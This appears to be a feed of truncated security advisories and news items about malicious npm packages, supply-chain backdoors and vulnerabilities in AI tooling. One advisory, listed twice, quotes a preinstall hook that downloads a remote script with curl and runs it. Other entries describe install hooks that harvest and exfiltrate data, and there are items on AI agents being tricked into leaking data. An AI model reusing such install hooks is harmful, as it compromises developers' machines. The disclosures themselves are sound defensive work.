Malicious code in oh-my-ashclaw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...

MAL-2026-5751 Malicious code in oh-my-ashclaw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...

WordPress Product Slider Pro for WooCommerce < 3.5.4 - Supply Chain Backdoor RCE

Improper Validation of Specified Quantity in Input vulnerability in ShapedPlugin, LLC Product Slider Pro for WooCommerce allows Malicious Software Implanted. This issue affects Product Slider Pro for WooCommerce: from n/a before 3.5.4. id: CVE-2026-49777 info: name: WordPress Product Slider Pro f...

Malicious code in ecto_module (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7e66c690abd94ee498cd359eb076451c0f6ea3956d8221616bbf8990d35a38c5 On npm install, the package's preinstall hook node index.js reads /flag.txt falling back to execSync'cat /flag' and transmits the captured contents i...

MAL-2026-5712 Malicious code in jextic-eclib (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 13a6476409b9cb9296b7f778be375081c8ad12b030658351092e9fef90f4b707 On npm install, the package's postinstall hook postinstall.js requires index.js, whose top-level scanAndExfiltrate call walks the installer's working...

MAL-2026-5708 Malicious code in vite-svgr (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5 Package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths package.json description: 'Load no...

CVE-2026-47190 IPAM controller service account granted unnecessary full access to Secrets

IPAM is the IP address Manager for Cluster API Provider Metal3. Prior to versions 1.11.7, 1.12.4, and 1.13.0, the IPAM controller's ClusterRole granted full CRUD permissions create, delete, get, list, patch, update, watch on core/v1 Secrets. The controller never accesses Secrets during normal...

ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories

It's been one of those weeks. You expect the usual noise: recycled malware, sloppy attacks, another easy target getting hit. Instead, there's a supply chain attack kit in a public repo, a $5,000-a-month RAT that clones browsers, and research showing AI agents can be tricked into leaking real...

Malicious code in optional-cpu-features (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4dbbb7dd9c604ef3e5782d477d4db7c04c50f7906b19af03e63a540e0a44166e On npm install, both the install and postinstall lifecycle scripts run node install.js, which requires lib/sync.js. That file hardcodes BASE =...

MAL-2026-5646 Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

GitHub to Disable npm Install Scripts by Default to Stop Supply Chain Attacks

GitHub has announced what it said are "breaking changes" coming to npm version 12, one of which turns off install scripts by default to combat software supply chain threats. The changes aim to combat attack techniques that abuse the "npm install" command to trigger the execution of malicious code...

claude-code-f002-poc

F002: Supply Chain Attack via Non-Interactive Workspace Trust...

CVE-2026-46517

LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, hardcoded "trustremotecode=True" enables HF supply-chain RCE without user opt-in. At time of publication, there are no publicly available patches...

MAL-2026-5555 Malicious code in express-timer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683 express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on...

Malicious code in @monitoring-lib/error-tracking (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 491603ad44ed812c3d248696b00f7d4801a4c1dc23e4f23a3bb86f2ef499616d On npm install, the preinstall lifecycle hook in package.json runs a Node one-liner that reads the installer's hostname os.hostname and username...

MAL-2026-5536 Malicious code in zer0onedatetool (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 73fd05fda74bbf13c6275d4da0fa80fece821cad03fb2237ae74ed24309eab52 The postinstall lifecycle script in this package issues curl POST requests to a subdomain of oastify.com — the out-of-band callback domain operated b...

Malicious code in zer0onedatetool (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 73fd05fda74bbf13c6275d4da0fa80fece821cad03fb2237ae74ed24309eab52 The postinstall lifecycle script in this package issues curl POST requests to a subdomain of oastify.com — the out-of-band callback domain operated b...

vLLM's Artifact Pin Decay allows pinned deployments to load unpinned code, weights, and processors

Summary vLLM's revision pinning controls do not consistently apply to all artifacts loaded for a model. A deployment that supplies --revision or --code-revision can still load dynamic code, GGUF files, image processors, retrieval side weights, or same-repository subfolder weights/config from an...

EUVD-2026-35874

LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, hardcoded "trustremotecode=True" enables HF supply-chain RCE without user opt-in. At time of publication, there are no publicly available patches...